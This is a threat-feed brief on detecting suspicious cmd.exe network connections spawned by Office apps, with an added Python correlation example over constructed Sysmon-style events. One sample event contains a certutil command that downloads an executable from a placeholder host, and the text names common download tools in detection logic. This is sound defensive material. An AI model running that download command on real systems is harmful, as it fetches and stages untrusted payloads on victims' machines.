{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/products/ms-publisher/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","SentinelOne Cloud Funnel","Excel","MS Access","MS Publisher","PowerPoint","Word","Outlook"],"_cs_severities":["low"],"_cs_tags":["command-prompt","network-connection","windows","execution","command-and-control"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","SentinelOne"],"content_html":"\u003cp\u003eThis detection identifies suspicious network connections initiated by the command prompt (cmd.exe) on Windows systems. The rule focuses on cmd.exe processes executed with specific arguments, such as those indicating script execution (e.g., *.bat, *.cmd), access to remote resources (e.g., URLs), or those spawned by Microsoft Office applications (Excel, Word, etc.). Attackers frequently abuse cmd.exe to download malicious payloads, execute commands, or establish command and control channels. This detection aims to identify such potentially malicious activity by correlating process creation events with subsequent network connections. The rule excludes common private and reserved IP address ranges to reduce false positives. 
The targeted systems are Windows endpoints where adversaries attempt to leverage cmd.exe for malicious purposes.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA user opens a malicious document (e.g., Word, Excel) or executes a seemingly benign application.\u003c/li\u003e\n\u003cli\u003eThe document or application contains a macro or script that initiates a cmd.exe process.\u003c/li\u003e\n\u003cli\u003eThe cmd.exe process is launched with arguments indicating script execution (\u003ccode\u003e/c\u003c/code\u003e, \u003ccode\u003e/k\u003c/code\u003e) and referencing a remote resource (e.g., a URL or UNC path) or a local batch file.\u003c/li\u003e\n\u003cli\u003eThe cmd.exe process attempts to download a payload from a remote server using protocols like HTTP, HTTPS, or FTP. Because cmd.exe has no built-in download client, the transfer is usually performed by a child process it launches (for example certutil.exe, curl.exe, bitsadmin.exe, or powershell.exe); a network connection attributed to the cmd.exe process itself is less common and correspondingly more suspicious.\u003c/li\u003e\n\u003cli\u003eThe downloaded payload is saved to disk, often with a disguised filename.\u003c/li\u003e\n\u003cli\u003eThe cmd.exe process executes the downloaded payload, initiating further malicious actions.\u003c/li\u003e\n\u003cli\u003eThe malicious payload establishes a command and control (C2) channel with a remote server.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the C2 channel to send commands to the compromised system, potentially leading to data exfiltration or other malicious activities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eIf this activity goes undetected, it can lead to the compromise of Windows endpoints, enabling attackers to download and execute malicious payloads, establish command and control channels, and perform further malicious activities such as data theft, lateral movement, or ransomware deployment. 
While this detection has a low severity, it serves as an early warning sign of potential compromise and should be investigated promptly.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable process creation logging with command line arguments (Windows Security Event ID 4688 with command-line auditing enabled, or Sysmon Event ID 1) to capture the full context of cmd.exe executions, including the parent process.\u003c/li\u003e\n\u003cli\u003eMonitor network connections from cmd.exe processes, focusing on connections to external IP addresses, using endpoint telemetry that records the originating process (for example Sysmon Event ID 3 or an EDR sensor); a network-only sensor sees the flow but cannot attribute it to cmd.exe.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules provided in this brief to your SIEM to detect suspicious cmd.exe network connections.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rules, focusing on cmd.exe processes spawned by Office applications or those executing scripts from remote URLs; also review the child processes of the alerting cmd.exe (certutil.exe, curl.exe, bitsadmin.exe, powershell.exe) for the actual download and any files written as a result.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T12:00:00Z","date_published":"2024-01-02T12:00:00Z","id":"/briefs/2024-01-suspicious-cmd-network/","summary":"This alert identifies suspicious network connections initiated by the command prompt (cmd.exe) when executed with arguments indicative of script execution, remote resource access, or originating from Microsoft Office applications, which is a common tactic for downloading payloads or establishing command and control.","title":"Suspicious Command Prompt Network Connection","url":"https://feed.craftedsignal.io/briefs/2024-01-suspicious-cmd-network/"}],"language":"en","title":"CraftedSignal Threat Feed — MS Publisher","version":"https://jsonfeed.org/version/1.1"}
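To make the correlation described in the brief concrete, the following is an added example that is not part of the CraftedSignal brief and not any vendor's rule. It applies the stated logic (a cmd.exe process start followed by a network connection from the same process, flagged only when the command line indicates .bat/.cmd execution or a remote resource, or the parent is an Office application, and ignoring private and reserved destinations) to a handful of constructed Sysmon-style records. The field names, the Office parent list, the excluded ranges and the sample events are assumptions chosen for illustration; map them onto your own SIEM schema.

```python
"""Correlate cmd.exe process creation with later network connections.

Added example, not from the original brief. Event records mimic Sysmon
Event ID 1 (process creation) and Event ID 3 (network connection); the
field names are assumptions, not a vendor schema.
"""
import ipaddress
import re
from typing import Dict, List

# Parent processes that normally have no business spawning a cmd.exe that
# talks to the internet (assumed list, extend as needed).
OFFICE_PARENTS = {
    "winword.exe", "excel.exe", "powerpnt.exe",
    "outlook.exe", "msaccess.exe", "mspub.exe",
}

# Command-line indicators from the brief: batch/script execution and
# remote resources (URL or UNC path).
SCRIPT_ARG = re.compile(r"\.(?:bat|cmd)\b", re.IGNORECASE)
REMOTE_ARG = re.compile(r"\b(?:https?|ftp)://|\\\\[\w.-]+\\", re.IGNORECASE)

# Private, loopback, link-local and multicast ranges excluded to cut noise.
EXCLUDED_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "224.0.0.0/4", "::1/128", "fe80::/10", "fc00::/7",
)]


def is_excluded_destination(ip: str) -> bool:
    """True when the destination falls in a private/reserved range."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in EXCLUDED_NETS)


def suspicious_reasons(parent_image: str, command_line: str) -> List[str]:
    """Return the indicators that make this cmd.exe launch interesting."""
    reasons = []
    parent = parent_image.rsplit("\\", 1)[-1].lower()
    if parent in OFFICE_PARENTS:
        reasons.append(f"spawned by Office application {parent}")
    if SCRIPT_ARG.search(command_line):
        reasons.append("script execution (.bat/.cmd) in command line")
    if REMOTE_ARG.search(command_line):
        reasons.append("remote resource (URL or UNC path) in command line")
    return reasons


def correlate(events: List[Dict]) -> List[Dict]:
    """Sequence by process GUID (not PID, which Windows reuses): a cmd.exe
    start followed by a connection from that process to a non-excluded IP."""
    starts: Dict[str, Dict] = {}
    alerts: List[Dict] = []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["image"].rsplit("\\", 1)[-1].lower() != "cmd.exe":
            continue
        if ev["event_id"] == 1:
            starts[ev["process_guid"]] = ev
        elif ev["event_id"] == 3:
            start = starts.get(ev["process_guid"])
            # No observed start, or an internal destination: drop silently.
            if start is None or is_excluded_destination(ev["dest_ip"]):
                continue
            reasons = suspicious_reasons(start["parent_image"], start["command_line"])
            if reasons:
                alerts.append({
                    "process_guid": ev["process_guid"],
                    "parent_image": start["parent_image"],
                    "command_line": start["command_line"],
                    "destination": f'{ev["dest_ip"]}:{ev["dest_port"]}',
                    "reasons": reasons,
                })
    return alerts


# Constructed sample telemetry (not real captures). Documentation-range
# addresses 203.0.113.0/24 and 198.51.100.0/24 stand in for the internet.
CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS = [
    {"time": 1, "event_id": 1, "process_guid": "A", "image": CMD,
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": r'cmd.exe /c "C:\Users\u\AppData\Local\Temp\update.bat"'},
    {"time": 2, "event_id": 3, "process_guid": "A", "image": CMD,
     "dest_ip": "203.0.113.10", "dest_port": 443},
    {"time": 3, "event_id": 1, "process_guid": "B", "image": CMD,
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"cmd.exe /c \\10.0.0.5\share\run.cmd"},
    {"time": 4, "event_id": 3, "process_guid": "B", "image": CMD,
     "dest_ip": "10.0.0.5", "dest_port": 445},           # internal: excluded
    {"time": 5, "event_id": 1, "process_guid": "C", "image": CMD,
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "cmd.exe /c certutil -urlcache -f http://198.51.100.7/a.exe a.exe"},
    {"time": 6, "event_id": 3, "process_guid": "C", "image": CMD,
     "dest_ip": "198.51.100.7", "dest_port": 80},
    {"time": 7, "event_id": 3, "process_guid": "D", "image": CMD,
     "dest_ip": "203.0.113.20", "dest_port": 443},       # no start seen: skipped
    {"time": 8, "event_id": 1, "process_guid": "E", "image": CMD,
     "parent_image": r"C:\Windows\explorer.exe", "command_line": "cmd.exe /c dir"},
    {"time": 9, "event_id": 3, "process_guid": "E", "image": CMD,
     "dest_ip": "203.0.113.30", "dest_port": 443},       # no indicator: no alert
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert["process_guid"], alert["destination"], "; ".join(alert["reasons"]))
```

Two design choices worth carrying into a production rule: sequence on a process GUID rather than a PID, because PIDs are reused and a stale match will pair a benign connection with an earlier suspicious launch; and keep the destination exclusion as a filter on the network event rather than on the alert, so that a UNC path to an internal file server (event B above) never reaches the analyst queue.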